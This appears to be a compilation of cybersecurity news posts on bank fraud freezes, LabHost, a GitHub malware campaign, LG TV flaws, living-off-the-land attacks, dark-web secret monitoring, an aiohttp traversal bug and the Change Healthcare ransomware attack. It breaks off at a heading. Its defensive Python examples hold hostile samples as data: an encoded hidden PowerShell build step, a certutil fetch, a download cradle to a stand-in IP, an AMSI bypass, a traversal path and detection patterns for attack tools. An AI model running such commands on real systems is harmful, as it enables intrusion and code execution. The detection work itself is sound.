
Indian Banks Mull New Move for Faster Freezing of Scammers’ Accounts

 

Indian banks have proposed integrating their systems with the National Cybercrime Reporting Portal (NCRP), a division of the ministry of home affairs, which could enable a quicker freeze on fraudulent accounts in the wake of a cyberattack. 

This is intended to prevent those who commit cybercrimes and phishing attacks from swiftly transferring funds from a target's bank account to accounts with various banks before it is withdrawn or spent. This is a tactic employed by voice phishers and cyber shysters to make it more difficult for banks and law enforcement to recover the funds. 

“Banks, in consultation with cybercrime experts, have recommended API integration with the NCRP to reduce the average response time and quick updation of cases. So, the idea is to mark a lien and freeze a bank account automatically without manual intervention,” noted a banker. “An industry sub-group has suggested this to I4C,” said the person. 

I4C, or the Indian Cybercrime Coordination Centre, is an MHA programme that focuses on combating cybercrime and enhancing coordination between law enforcement agencies (LEAs) and institutions such as banks. NCRP is a vertical under I4C.

API, or 'application programming interface', enables two applications or systems to interact with one another without the need for human intervention. If there is an API between a system with specific data and another system that requires reporting, the two can communicate without the need for manual data entry. In the event of a cybercrime, such as a hacked internet banking account, API integration would allow for the quick transmission of fraud information to a central system or other banks. 

“Typically, money from the account where the fraud happens is moved to accounts with several banks. There is a far better chance of retrieving the amount if the information is available with the entire industry instantaneously. The time spent by Bank A awaiting an instruction from a LEA, then sending emails to bank B, C and D, or calling them up, to request a lien on the accounts where funds have gone, can be saved,” noted another banker.

The group has also advised that data on accounts identified as lien and freeze be made available to banks on a regular basis so that they can reconcile their records. 

It has also been suggested that I4C share a broad standard operating procedure telling banks when to place accounts on hold, freeze or de-freeze them, and release funds to victims' accounts in cases reported to the NCRP. The nodal organisation should also, it is argued, set guidelines for sharing 'negative account' or KYC details between banks, so that a fraudster cannot open a fresh account at another bank using the same demographic or KYC details.

International Cyber Fraud Ring Busted By London Police

 

UK Police stated that they have infiltrated a massive phishing website on the dark web that has defrauded tens of thousands of individuals, and learned that university students have turned to cyber fraud as a way to increase their revenue. 

LabHost was a phishing-as-a-service platform that let its users generate realistic-looking copies of websites belonging to major brands, including big banks and other institutions, ensnaring victims around the world, 70,000 of them in the United Kingdom. It had been in operation since 2021. 

Victims entered private data, some of which were used to steal money, but the site's creators also profited by selling details to fraudsters on the dark web.

According to the Metropolitan Police, most victims were between 25 and 44 years old and spent much of their time online. Police believe they apprehended one of the site's suspected masterminds this week, among 37 individuals detained in the UK and abroad.

The Metropolitan Police reported that arrests were made at Manchester and Luton airports, as well as in Essex and London. Policing in the UK is under pressure to prove that it is effectively combating the rise in cyber fraud.

The site's infiltration is a drop in the ocean compared to the scope of the problem, but police seek to shake criminals' confidence in their ability to act with impunity and intend to shut down more cyber fraud sites. 

In the midst of struggles for resources against other criminal objectives like protecting children and bolstering what is often viewed as inadequate protection of women, fraud and cybercrime are seen as difficult crimes for law enforcement to solve. 

The Met is currently enjoying its success: the main users of the website have been arrested, and 25,000 victims in the UK have been notified. Some users will not be arrested, though, because investigators do not know who they really are.

LabHost harvested 480,000 debit or credit card numbers and 64,000 PINs, and generated £1 million from around 2,000 customers who paid up to £300 a month in Bitcoin for membership. It marketed itself as a “one-stop-shop for phishing.”

It included a tutorial video on how to use the site to commit fraud, in the style of a consumer product walkthrough. The video claimed that set-up takes five minutes and that “customer service” was available if there were any issues. It concluded by urging its criminal users, “Stay safe and good spamming.”

Hackers Use GitHub Search to Deliver Malware

 

Checkmarx, an application security firm, has discovered that threat actors are altering GitHub search results in order to infect developers with persistent malware.

As part of the campaign, attackers were seen developing fake repositories with popular names and themes, and then boosting their search ranks using automatic updates and fake ratings. 

To avoid detection, the threat actors hid the malicious payload inside Visual Studio project files, so that it runs at build time and drops malware resembling the Keyzetsu clipper, which targets cryptocurrency wallets. On Windows machines the malware persists through a scheduled task that runs it daily. 

The threat actors were observed using GitHub Actions to update the malicious repositories automatically by committing trivial changes to a file named 'log', which keeps the repositories looking freshly maintained, boosts their visibility in GitHub search and raises the chance that users land on them. 

Furthermore, the attackers were detected adding fictitious stars to their repositories from various fake identities, tricking users into believing the repositories are popular and genuine. 

“Unsuspecting users, often drawn to the top search results and repositories with seemingly positive engagement, are more likely to click on these malicious repositories and use the code or tools they provide, unaware of the hidden dangers lurking within,” Checkmarx stated. 

The attackers placed their payload in a Visual Studio project file's pre-build event, so that it runs automatically whenever the project is built. The payload checks the system's IP address to determine whether the machine is in Russia, then, depending on the victim's country, downloads encrypted files from specific URLs, extracts them and runs their contents. 

On April 3, the attackers switched to a new URL pointing to an archived executable. To evade security products, they padded the executable with a large number of zero bytes, inflating it past the size that many scanners will inspect.

"The results of our analysis of this malware suggest that the malware contains similarities to the 'Keyzetsu clipper' malware, a relatively new addition to the growing list of crypto wallet clippers commonly distributed through pirated software," Checkmarx said in a press release.

For persistence, the malware creates a scheduled task that points to a shortcut to its executable. Several of the malicious repositories have received complaints from infected users, which suggests the campaign has succeeded in infecting developers. 

“In the aftermath of the XZ attack and many other recent incidents, it would be irresponsible for developers to rely solely on reputation as a metric when using open-source code. These incidents highlight the necessity for manual code reviews or the use of specialized tools that perform thorough code inspections for malware,” Checkmarx added.
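Checkmarx's write-up describes the payload hiding in a Visual Studio pre-build event. The following is an added example, not Checkmarx's tooling or code from the campaign: it scans MSBuild project files (.vcxproj and .csproj) for pre- and post-build commands that look like a dropper rather than a build step, and decodes any PowerShell -EncodedCommand argument for triage. The sample project, its hostname (example.invalid) and the base64 blob are constructed for the demonstration.

```python
"""Scan MSBuild project files (.vcxproj / .csproj) for pre/post-build
commands that look like a malware dropper rather than a build step.
Added example, not Checkmarx's tooling; the sample project and its
encoded blob are constructed for the demonstration."""
import base64
import re
import xml.etree.ElementTree as ET

# Heuristics for build-event commands that have no business in a normal build.
SUSPICIOUS_PATTERNS = [
    (r"\bpowershell(?:\.exe)?\b.*?\s-(?:e|ec|enc|encodedcommand)\s", "encoded PowerShell command"),
    (r"-w(?:indowstyle)?\s+hidden\b", "hidden window"),
    (r"\b(?:iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest|net\.webclient)\b",
     "download-and-execute primitive"),
    (r"\b(?:certutil|bitsadmin|mshta|curl|wget)\b", "LOLBin downloader"),
    (r"https?://", "remote URL in build step"),
    (r"\b(?:schtasks|reg\s+add|start\s+/b)\b", "persistence or background launch"),
]
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def _local(tag):
    """Strip the MSBuild XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def decode_encoded_command(cmd):
    """Decode a PowerShell -EncodedCommand blob (base64 of UTF-16LE); None if absent/invalid."""
    m = ENCODED_ARG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def build_commands(xml_text):
    """Yield (kind, command) for every build-event command in the project file."""
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        name = _local(elem.tag)
        if name in ("PreBuildEvent", "PostBuildEvent"):
            # .csproj puts the command text directly in the element ...
            if elem.text and elem.text.strip():
                yield name, elem.text.strip()
            # ... .vcxproj nests it in a <Command> child.
            for child in elem:
                if _local(child.tag) == "Command" and child.text and child.text.strip():
                    yield name, child.text.strip()
        elif name == "Exec" and elem.get("Command"):
            yield "Exec", elem.get("Command").strip()


def scan_project(xml_text):
    """Return the build commands that match at least one suspicious pattern."""
    findings = []
    for kind, cmd in build_commands(xml_text):
        reasons = [label for pat, label in SUSPICIOUS_PATTERNS if re.search(pat, cmd, re.I)]
        if reasons:
            findings.append({"kind": kind, "command": cmd, "reasons": reasons,
                             "decoded": decode_encoded_command(cmd)})
    return findings


# Constructed .vcxproj: one benign pre-build event, one encoded PowerShell
# launch, and an <Exec> target that fetches a file with certutil.
SAMPLE_PROJECT = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup>
    <PreBuildEvent>
      <Command>echo Building $(ProjectName)</Command>
    </PreBuildEvent>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)'=='Release'">
    <PreBuildEvent>
      <Command>powershell -w hidden -NoP -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA</Command>
    </PreBuildEvent>
  </ItemDefinitionGroup>
  <Target Name="Fetch" BeforeTargets="PreBuildEvent">
    <Exec Command="certutil -urlcache -split -f https://example.invalid/log.txt %TEMP%\\log.txt" />
  </Target>
</Project>
"""

if __name__ == "__main__":
    for f in scan_project(SAMPLE_PROJECT):
        print(f["kind"], "->", ", ".join(f["reasons"]))
        print("   ", f["command"])
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

Run it over every project file in a freshly cloned repository before opening it in the IDE; the check costs nothing and catches exactly the step the campaign relies on, the build running code the developer never read.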

Offensive Security Necessitates a Data-driven Approach for CISOs

 

There remains a significant disparity between spending on defensive and offensive security tooling. When comparing the return on investment (ROI) of the two, security practitioners commonly find that offensive security comes out ahead: penetration testing not only identifies vulnerabilities but, through remediation of its findings, closes the entry points an attacker would use. 

This should lead organisations and their security leaders to ask why so little is invested in offensive security. Many CISOs recognise a clear gap in the market for offensive security, with tooling acquired piecemeal failing to keep up with the changing needs of modern enterprises. CISOs should now examine how a data-driven approach can demonstrate ROI for each offensive security expenditure they make. 

Data science and cybersecurity: A powerful duo

In an era of digital transformation and networked systems, cybersecurity incidents have increased tremendously. Businesses face a slew of dangers, including unauthorised access and malware attacks. To tackle this, data science may give analytics that assist security leaders in making informed decisions about their cyber resiliency plans and tactics. 

Data analytics, whether powered by security providers and in-house technology like AI/ML or threat intelligence feeds, entails identifying patterns and insights from cybersecurity data, generating data-driven models, and developing intelligent security systems. By analysing relevant data sources from security testing across assets, systems, customers, and industries (including network activity, database logs, application behaviour, and user interactions), they may deliver actionable intelligence to secure their assets.

However, the most significant benefit of data analytics is that it improves decision-making by supplying the context and evidence behind user behaviour, whether authorised or not.

Data-driven decision making in offensive security

Data-driven decision-making is the foundation of effective offensive security. Here is how it plays out.

• Threat intelligence: Data analytics lets organisations gather, process and analyse threat intelligence. Defenders obtain near-real-time insight from monitoring indicators of compromise (IoCs), attack patterns and vulnerabilities. These findings inform proactive steps such as fixing key vulnerabilities and tuning security rules. 

• Behavioural analytics: Understanding user behaviour is critical. Data-driven models detect anomalies and highlight questionable activity; for example, an unexpected spike in outbound data volume or an atypical login pattern should raise an alarm. Behavioural analytics can also help uncover insider threats, which are becoming increasingly prevalent. 

Challenges and future directions 

While data analytics can boost offensive security and decision-making, major challenges persist. Data quality is critical for accurate and actionable intelligence; as the phrase goes, "Garbage in, garbage out." Balancing privacy and ethics can also be difficult, but because security testing data should be free of PII, the focus should be on the intelligence that helps make better decisions rather than on personal data.

Ultimately, offensive security practitioners must anticipate adversary attacks. However, the future seems promising, as data analytics can propel offensive security as a viable and evidence-based strategy. With analytics, security executives can proactively defend against attacks. As threats develop, so should our data-driven defences.

91,000 Smart LG TV Devices Susceptible to Unauthorised Remote Access

 

New vulnerabilities have been discovered in LG TVs that could allow unauthorised root-level access to the devices, potentially exposing thousands of units worldwide. 

The finding, made as part of Bitdefender's continuing inspection of popular Internet of Things (IoT) devices, concerns vulnerabilities in WebOS versions 4 through 7 as used in LG sets. The flaws allow unauthorised access at the root level by bypassing the authorisation check. 

Although the vulnerable service is intended for use only on the local network, Shodan, a search engine for internet-connected devices, has identified over 91,000 devices that expose it to the internet. 

Among the flaws, CVE-2023-6317 stands out: it allows attackers to bypass the authorisation mechanism and gain unauthorised access to the TV. CVE-2023-6318 then lets them escalate that access to root privileges, compounding the risk. 

CVE-2023-6319 allows operating system command injection, while CVE-2023-6320 enables authenticated command injection. The affected models are LG43UM7000PLA, OLED55CXPUA, OLED48C1PUB and OLED55A23LA. Devices running WebOS versions 4.9.7 through 7.3.1 have been confirmed to be affected. 

“Attackers could use the compromised Smart TV as a starting point to launch additional attacks against remote systems or hosts,” noted Thomas Richards, principal security consultant at the Synopsys Software Integrity Group.

According to Richards, if attackers gain administrative access to the TV, personal information stored on it, including login credentials, can be compromised. 

“Smart TV owners should not have their TVs directly connected to the internet. Keeping the TV behind a router will reduce the likelihood of a compromise since remote attackers will not be able to reach it,” Richards added. “Enabling the automatic update option on the TV will keep the TV up to date with vendor patches to remediate security risks.” 

Bitdefender's disclosure timeline shows the approach followed: the vendor was notified on November 1, 2023, and a fix was released on March 22, 2024. In the face of emerging threats, prompt patching and upgrades are critical to minimising risk, safeguarding user privacy and improving device security.

Living-Off-the-Land (LOTL) Attacks: Here's Everything You Need to Know

 

In cybersecurity's unrelenting fight, attacks continue to become more elusive and sophisticated. Among them, threat actors who use Living Off the Land (LOTL) techniques have emerged as formidable adversaries, abusing legitimate system features and functionality to compromise networks stealthily. 

As defenders grapple with this stealthy threat, a new advisory from the Cybersecurity and Infrastructure Security Agency (CISA) sheds light on the tactics, techniques and procedures (TTPs) attackers use and provides critical insight into recognising and combating LOTL attacks. LOTL attacks use pre-existing software and legitimate system tools to carry out malicious actions, allowing attackers to go undetected amid normal system activity. 

Rather than writing their own malware or tools, attackers take advantage of built-in programs such as PowerShell, first released in November 2006 and shipped with Windows since Windows 7. 

Benefits of leveraging existing tools in cyber attacks 

The appeal of employing existing technologies stems from their widespread availability and familiarity inside enterprise environments. These tools enable simple access to both local and domain-based setups, allowing attackers to automate administrative activities and execute commands with ease. By using these tools, attackers avoid the time-consuming process of developing, testing, and distributing specialised tools, saving both time and resources. 

Furthermore, the intrinsic complexity of developing and distributing tooling across numerous operating systems and environments presents a significant challenge for cybercriminals. By leveraging existing tools, attackers avoid the need to address compatibility issues, dependencies, and potential detection systems. This method significantly lowers the chance of discovery because built-in tools blend smoothly into regular system activity, making it difficult for defenders to distinguish between authorised and malicious use. 

Prevention tips

It is impossible to overstate the importance of mitigating LOTL techniques in light of CISA's latest Volt Typhoon advisory. Defenders need to be proactive and alert as attackers continue to hone their tradecraft and look for gaps in organisational defences. 

Organisations can fortify their defences and mitigate the risks posed by LOTL attacks by utilising the insights in the research and implementing a defence-in-depth security strategy. Here's how organisations can successfully defend against LOTL attacks. 

Visibility is critical: relying solely on preventative technology is insufficient against attackers who use authorised tools. Visibility into all activity across the entire infrastructure is required to detect and mitigate such risks. 

Identify authorised users: Determine who should be using the tools that LOTL attacks rely on, such as scripting languages and administrative utilities, and treat use by anyone else, or from anywhere else, as a signal. 

Enable comprehensive logging: Use granular logging to monitor use of LOTL tools. For example, enabling script block and module logging for PowerShell records the commands that were actually executed, not merely that PowerShell was launched.
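Script Block Logging is turned on by the "Turn on PowerShell Script Block Logging" policy (registry value EnableScriptBlockLogging under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging), after which the executed script text lands as Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log. The following added example, not part of CISA's advisory or this post, shows what to do with those records once they are flowing: it applies the two controls above, an allow-list of who and where PowerShell is expected, plus content indicators that legitimate administration rarely produces. The events, user names, host names and allow-lists are constructed for the demonstration.

```python
"""Triage of PowerShell Script Block Logging records (Event ID 4104) against
an allow-list of expected users/hosts and a set of LOTL content indicators.
Added example; the events, user names and host names are constructed."""
import re
from typing import List, Optional

# Assumption for the demo: a small admin team working from jump hosts.
AUTHORISED_USERS = {"CORP\\adm-jsmith", "CORP\\adm-rlee", "CORP\\svc-sccm"}
ADMIN_HOSTS = {"JUMP01", "JUMP02", "SCCM01"}

# Script-block content that legitimate administration rarely produces.
INDICATORS = [
    (r"amsiutils|amsiinitfailed|amsi\.dll", "AMSI bypass"),
    (r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", "download cradle"),
    (r"frombase64string|-encodedcommand|-enc\b", "encoded/obfuscated payload"),
    (r"invoke-mimikatz|sekurlsa|lsass", "credential access"),
    (r"register-scheduledtask|schtasks", "scheduled-task persistence"),
    (r"win32_shadowcopy|vssadmin\s+delete|wbadmin\s+delete", "shadow-copy tampering"),
]
SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2}


def classify(event: dict) -> Optional[dict]:
    """Attach severity and reasons; None when nothing about the event is unusual."""
    context = []
    if event["user"] not in AUTHORISED_USERS:
        context.append(f"unexpected user {event['user']}")
    if event["host"] not in ADMIN_HOSTS:
        context.append(f"PowerShell on non-admin host {event['host']}")
    content = [label for pat, label in INDICATORS if re.search(pat, event["script"], re.I)]
    if content and context:
        severity = "high"      # hostile content from somewhere it should not come from
    elif content:
        severity = "medium"    # trusted operator, but the script itself is suspect
    elif context:
        severity = "low"       # benign-looking script, wrong user or host (baseline drift)
    else:
        return None
    return {**event, "severity": severity, "reasons": context + content}


def triage(events: List[dict]) -> List[dict]:
    """Alerts ordered by severity, then by how many reasons fired."""
    alerts = [a for a in map(classify, events) if a]
    alerts.sort(key=lambda a: (SEVERITY_RANK[a["severity"]], -len(a["reasons"])))
    return alerts


# Constructed 4104-style records: ScriptBlockText plus the user/host fields of the event.
SAMPLE_EVENTS = [
    {"time": "2024-04-10T08:02:11Z", "host": "JUMP01", "user": "CORP\\adm-jsmith",
     "script": "Get-ADUser -Filter * -Properties LastLogonDate | Export-Csv users.csv"},
    {"time": "2024-04-10T08:05:43Z", "host": "WS-1042", "user": "CORP\\jdoe",
     "script": "$c=New-Object Net.WebClient;IEX $c.DownloadString('http://203.0.113.10/a.ps1')"},
    {"time": "2024-04-10T08:07:02Z", "host": "JUMP02", "user": "CORP\\adm-rlee",
     "script": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
               ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"time": "2024-04-10T08:09:30Z", "host": "WS-1042", "user": "CORP\\jdoe",
     "script": "Get-Process | Where-Object CPU -gt 50"},
]

if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(f"[{a['severity']:6s}] {a['time']} {a['host']} {a['user']}: {'; '.join(a['reasons'])}")
```

The point of the two-axis scoring is that neither axis alone is enough against LOTL: the admin's AMSI-tampering script on a jump host passes the allow-list, and the workstation user's harmless Get-Process passes the content check, but both are worth a look, and the download cradle from an unexpected user on an unexpected host is the one to page on.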

Here's Why Tracking Everything on the Dark Web Is Vital

 

Today, one standard cybersecurity practice is to monitor the Dark Web, the criminal underground's go-to marketplace, for any sign that the organisation's trade secrets and other intellectual property have been compromised. 

The issue is that most chief information security officers (CISOs) and security operations centre (SOC) managers assume that any discovery of sensitive company data means their enterprise systems have been breached. It might well mean that, but it could also mean a hundred other things. The data may have been stolen from a supply chain partner, a corporate cloud site, a shadow cloud site, an employee's home laptop, a corporate backup provider, a disaster recovery firm, a smartphone, or even a thumb drive pilfered from a car.

When dealing with everyday intellectual property, such as consumer personally identifiable information (PII), healthcare data, payment card data, or designs for a military weapons system, knowing that some version of it has been acquired is useful. However, it is nearly impossible to know what to do unless the location, timing and manner of the theft are known. 

In some cases the answer could be "nothing." Consider your most sensitive machine secrets: API keys, access tokens, passwords, encryption keys and other access credentials. If their issuance and rotation are carefully recorded and logged, your team may find that the secrets discovered on the Dark Web have already been revoked and replaced. No further action would be needed.

Getting the info right

Most CISOs recognise that discovering secrets on the Dark Web indicates a compromise. Without accurate details, however, they frequently overreact, or react improperly, and implement costly and disruptive changes that may be entirely unnecessary. 

This can even include making regulatory disclosures on wrong assumptions, for example under the European Union's General Data Protection Regulation (GDPR) or the Securities and Exchange Commission's (SEC) cybersecurity rules, exposing the organisation to avoidable stock drops and compliance fines. 

Establishing best practices

You must keep a tightly controlled inventory of all of your secrets, with a fingerprint (hash) of each so that every use, and any leaked copy, can be traced back to the credential it belongs to, where it was issued and whether it has since been rotated. This is the only way to keep track of all activity involving your machine credentials in real time. Done aggressively, this should let you detect a stolen machine credential before it reaches the Dark Web and is sold to the highest bidder.

Another good strategy is to regularly seed the Dark Web, and other criminal haunts, with decoy files to add noise to the mix. Some discerning criminals may avoid your data entirely if they cannot tell whether it is genuine.
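The inventory described above, as an added example that is not part of the original post: secrets are stored only as keyed-hash fingerprints, so a string pulled from a dump can be matched to the credential it is, its owning system and its rotation status without the inventory itself becoming a secret store. Planted decoys are registered the same way, so a hit on one tells you which planting location leaked. The pepper, the sample key strings and the system names are constructed for the demonstration; in production the pepper lives in a KMS or HSM.

```python
"""Secret inventory keyed by keyed-hash fingerprints, so a string found in a
dark-web dump can be matched to the credential it is, where it was issued and
whether it is already rotated, without the inventory storing the secrets
themselves. Added example; the pepper, sample secrets and systems are constructed."""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Dict, List, Optional

# In production this key lives in a KMS/HSM; a constructed value here so the demo runs.
PEPPER = b"demo-only-pepper-not-for-production"


def fingerprint(secret: str) -> str:
    """HMAC-SHA256 of the secret: matchable, but not reversible without the pepper."""
    return hmac.new(PEPPER, secret.encode("utf-8"), hashlib.sha256).hexdigest()


@dataclass
class SecretRecord:
    name: str
    system: str                      # where the credential is used / who owns it
    issued: str                      # ISO date
    rotated: Optional[str] = None    # ISO date once revoked and replaced
    decoy: bool = False              # a canary planted deliberately (the "false files" above)
    planted_at: Optional[str] = None


class SecretInventory:
    def __init__(self) -> None:
        self._by_fp: Dict[str, SecretRecord] = {}

    def register(self, secret: str, record: SecretRecord) -> None:
        self._by_fp[fingerprint(secret)] = record   # the secret itself is never stored

    def retire(self, secret: str, rotated_on: str) -> None:
        self._by_fp[fingerprint(secret)].rotated = rotated_on

    def lookup(self, candidate: str) -> Optional[SecretRecord]:
        return self._by_fp.get(fingerprint(candidate))


def triage_dump(inventory: SecretInventory, leaked: List[str]) -> List[dict]:
    """Decide, per leaked string, whether it is ours and what (if anything) to do."""
    verdicts = []
    for value in leaked:
        rec = inventory.lookup(value)
        if rec is None:
            verdicts.append({"verdict": "UNKNOWN",
                             "detail": "not in inventory; check partners and other tenants"})
        elif rec.decoy:
            verdicts.append({"verdict": "DECOY_HIT",
                             "detail": f"canary planted at {rec.planted_at} was taken; investigate that location"})
        elif rec.rotated:
            verdicts.append({"verdict": "ALREADY_ROTATED",
                             "detail": f"{rec.name} rotated on {rec.rotated}; no action"})
        else:
            verdicts.append({"verdict": "ROTATE",
                             "detail": f"{rec.name} for {rec.system} is live; revoke and rotate now"})
    return verdicts


# Constructed sample credentials (not real keys).
LIVE_KEY = "sk_live_EXAMPLE_0001"
OLD_KEY = "sk_live_EXAMPLE_0002"
CANARY_KEY = "sk_live_CANARY_9999"


def build_demo_inventory() -> SecretInventory:
    inv = SecretInventory()
    inv.register(LIVE_KEY, SecretRecord("payments-api-key", "payments-api", "2024-01-10"))
    inv.register(OLD_KEY, SecretRecord("payments-api-key (prev)", "payments-api", "2023-06-01"))
    inv.retire(OLD_KEY, "2024-02-15")
    inv.register(CANARY_KEY, SecretRecord("canary", "none", "2024-03-01",
                                          decoy=True, planted_at="backup-share/keys.txt"))
    return inv


if __name__ == "__main__":
    for v in triage_dump(build_demo_inventory(), [LIVE_KEY, OLD_KEY, CANARY_KEY, "AKIA-not-ours"]):
        print(v["verdict"], "-", v["detail"])
```

Because matching is by fingerprint, the dump-handling team never needs read access to live credentials, and the four verdicts map directly onto the decisions the post argues for: rotate, do nothing, investigate a planting location, or look beyond your own perimeter.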

Threat Actors Exploit the Aiohttp Bug to Locate Susceptible Networks

 

The ransomware actor "ShadowSyndicate" has been observed scanning for servers vulnerable to the directory traversal flaw in the aiohttp Python library, CVE-2024-23334. 

aiohttp is an open-source library for handling large numbers of concurrent HTTP requests, as client or server, without conventional thread-based networking. It is built on Python's asyncio asynchronous I/O framework. 

Tech companies, web developers, data scientists and backend engineers use it to build high-performance web applications and services that combine data gathered from numerous external APIs. 

On January 28, 2024, aiohttp released version 3.9.2, which fixed CVE-2024-23334, a high-severity path traversal issue affecting aiohttp 3.9.1 and earlier that lets unauthenticated remote attackers read files on vulnerable servers. 

When 'follow_symlinks' is set to 'True' for static routes, the path supplied in the request is not adequately validated, allowing access to files outside the server's static root directory. On February 27, 2024, a researcher published a proof-of-concept (PoC) exploit for CVE-2024-23334 on GitHub, and a video with step-by-step exploitation instructions appeared on YouTube in early March.
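To make the flaw concrete, here is an added example that is not aiohttp's own code: it re-implements, in plain Python, the containment check a static-file route performs when resolving a requested path, in the shape this example understands the 3.9.1-to-3.9.2 change to have, and exercises it against a constructed directory layout. In aiohttp the setting in question is the `follow_symlinks=True` keyword of `app.router.add_static(...)`; the default is False. The directory names and file contents below are constructed.

```python
"""Path handling of an aiohttp-style static route, vulnerable vs fixed.
Added example: this re-implements the containment check in plain Python
so it runs without aiohttp; it mirrors the shape of the 3.9.1 -> 3.9.2
change as this example understands it, not aiohttp's own code."""
import os
import tempfile
from pathlib import Path
from typing import Optional


def resolve_static_path(directory: Path, filename: str,
                        follow_symlinks: bool, patched: bool) -> Optional[Path]:
    """Return the file a static handler would serve for `filename`, or None (404).

    `filename` is the part of the URL after the static prefix, e.g. "css/app.css".
    follow_symlinks=False: resolve symlinks, then require the real path to be inside root.
    follow_symlinks=True, unpatched: resolve and serve with no containment check (the bug).
    follow_symlinks=True, patched: lexically normalise '..' and require containment
    *before* resolving, so symlinks inside the root may still point outside
    (the feature) but '../' in the URL can no longer escape.
    """
    directory = directory.resolve()
    joined = directory.joinpath(filename)
    try:
        if not follow_symlinks:
            filepath = joined.resolve()
            filepath.relative_to(directory)       # raises ValueError on escape
        elif patched:
            normalized = Path(os.path.normpath(joined))
            normalized.relative_to(directory)     # lexical check, symlinks not yet followed
            filepath = normalized.resolve()
        else:
            filepath = joined.resolve()           # 3.9.1 behaviour: nothing stops '../'
    except ValueError:
        return None
    return filepath if filepath.is_file() else None


def build_lab() -> Path:
    """Constructed layout: <tmp>/static (served), <tmp>/outside/secret.txt (not served),
    and a symlink static/link -> outside, the case follow_symlinks=True exists for."""
    root = Path(tempfile.mkdtemp())
    static, outside = root / "static", root / "outside"
    static.mkdir()
    outside.mkdir()
    (static / "index.html").write_text("<h1>public</h1>\n")
    (outside / "secret.txt").write_text("top secret\n")
    os.symlink(outside, static / "link")
    return static


def demo() -> dict:
    """Run the same requests through the three configurations."""
    static = build_lab()
    traversal = "../outside/secret.txt"   # the generic traversal shape the advisory describes
    return {
        "vuln_traversal": resolve_static_path(static, traversal, True, False),
        "fixed_traversal": resolve_static_path(static, traversal, True, True),
        "fixed_symlink": resolve_static_path(static, "link/secret.txt", True, True),
        "no_follow_symlink": resolve_static_path(static, "link/secret.txt", False, False),
        "normal": resolve_static_path(static, "index.html", True, True),
    }


if __name__ == "__main__":
    for case, served in demo().items():
        print(f"{case:18s} -> {served if served else '404'}")
```

The instructive case is `fixed_symlink`: the fix does not disable symlink following, it only insists that the request path be inside the root before any link is resolved, which is why `Path.relative_to` has to run on the normalised path rather than the resolved one. Operationally the remedy is the same as the post's: upgrade to 3.9.2 or later, or leave `follow_symlinks` at its default.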

Cyble's threat analysts indicate that their scanners detected exploitation attempts targeting CVE-2024-23334 beginning on February 29 and continuing at an increasing pace throughout March.

The scanning originates from five IP addresses, one of which was identified in a Group-IB report from September 2023 as belonging to the ShadowSyndicate ransomware actor. 

ShadowSyndicate is an opportunistic, financially motivated threat actor, active since July 2022, that has been associated with an array of ransomware families, including Quantum, Nokoyawa, BlackCat/ALPHV, Clop, Royal, Cactus and Play. Group-IB suspects the actor is an affiliate involved in numerous ransomware operations. 

Cyble's findings, while not conclusive, suggest that threat actors may be scanning for servers running a vulnerable version of the aiohttp library. Whether these scans have led to breaches is unknown at this point. 

In terms of the attack surface, Cyble's internet scanner ODIN shows that there are around 44,170 internet-exposed aiohttp instances worldwide. The majority (15.8%) are in the United States, followed by Germany (8%), Spain (5.7%), the United Kingdom, Italy, France, Russia, and China.

Change Healthcare Detects Ransomware Attack Vector

 

The cyberattack's widespread disruption underscores how much damage threat actors can do by targeting a little-known vendor that performs a vital operational function behind the scenes.

The AlphV ransomware group disrupted critical US healthcare operations by attacking a vital financial and claims-processing link in a highly interconnected industry. The outage and its cascading effects on healthcare IT systems continued into their fourth week on Thursday.

UnitedHealth Group reported unauthorised access on its systems on February 21. The reconnecting and testing of Change's claims systems will be completed in phases next week.

The US Department of Health and Human Services launched an inquiry into the incident on Wednesday to investigate whether protected health information was stolen and if Change met privacy and security standards. 

The department's Office for Civil Rights (OCR) announced the investigation in a letter on Wednesday, with Director Melanie Fontes Rainer writing that it was necessary to look into the situation "given the unprecedented magnitude of this cyberattack, and in the best interests of patients and health care providers." 

The statement comes following a crisis meeting on Tuesday with White House officials, medical sector leaders, HHS Secretary Xavier Becerra, and Andrew Witty, CEO of UnitedHealth Group, Change Healthcare's parent company. 

According to Fontes Rainer, the investigation will focus on whether protected health information was compromised and if Change Healthcare and UHG followed Health Insurance Portability and Accountability Act (HIPAA) requirements. 

“OCR’s interest in other entities that have partnered with Change Healthcare and UHG is secondary. While OCR is not prioritizing investigations of healthcare providers, health plans, and business associates that were tied to or impacted by this attack, we are reminding entities that have partnered with Change Healthcare and UHG of their regulatory obligations and responsibilities, including ensuring that business associate agreements are in place and that timely breach notification to HHS and affected individuals occurs as required by the HIPAA Rules,” Rainer said. 

The American Hospital Association referred to the attack as the most significant and consequential incident of its kind against the U.S. healthcare system in history.

Cyberattack is Wreaking Havoc on US HealthCare Providers.

 

Following last month's cyberattack on Change Healthcare, a subsidiary of the largest health insurer in the United States, health care providers are still scrambling as insurance payments and prescription orders remain disrupted, costing physicians an estimated $100 million a day. 

According to the American Medical Association, that estimate was generated by First Health Advisory, a cybersecurity company that focuses on the healthcare sector.

"This massive breach and its wide-ranging repercussions have hit physician practices across the country, risking patients' access to their doctors and straining the viability of medical practices themselves," AMA President Dr. Jesse Ehrenfeld stated in a news release. 

"Against the backdrop of persistent Medicare cuts, rising practice costs and spiraling regulatory burdens, this unparalleled cyberattack and disruption threatens the viability of many practices, particularly small practices and those in rural and underserved areas," he added. "This is an immense crisis demanding immediate attention.” 

How did the crisis start? 

